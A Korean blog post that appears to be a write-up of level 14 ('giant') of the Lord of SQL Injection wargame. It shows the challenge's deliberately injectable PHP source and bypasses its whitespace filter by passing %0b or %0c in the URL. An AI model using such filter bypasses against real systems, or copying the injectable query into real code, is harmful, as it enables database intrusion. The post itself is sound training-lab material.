Oh! JUN
[Lord Of SQL Injection] 14번 본문
query : select 1234 fromprob_giant where 1
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>
fromprob_giant 붙어있는거 공백을 만들어줘야 된다.
\n, \r, \t 공백을 우회할때 많이 사용하는것들이 필터링되었다.
그래서 찾아보니까
%09 : tab(\t)
%0a : line feed(\n)
%0b : vertical tab
%0c : form feed
%0d : carriage return(\r)
이렇게 있었다.
%09, %0a, %0d는 필터링 되어있으니까 나머지 %0b, %0c를 사용해보자
https://los.rubiya.kr/chall/giant_18a08c3be1d1753de0cb157703f75a5e.php?shit=%0c
query : select 1234 fromprob_giant where 1
GIANT Clear!
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>
https://los.rubiya.kr/chall/giant_18a08c3be1d1753de0cb157703f75a5e.php?shit=%0b
query : select 1234 fromprob_giant where 1
GIANT Clear!
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>
%0b, %0c 둘다 정상적으로 작동된다.
'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글
[Lord Of SQL Injection] 16번 문제(싱글쿼터 우회) (0) | 2022.02.05 |
---|---|
[Lord Of SQL Injection] 15번 (0) | 2022.02.05 |
[Lord Of SQL Injection] 13번 (0) | 2022.02.03 |
[Lord Of SQL Injection] 12번(자세한 설명,수정완료) (0) | 2022.02.02 |
[Lord Of SQL Injection] 11번 (0) | 2022.02.02 |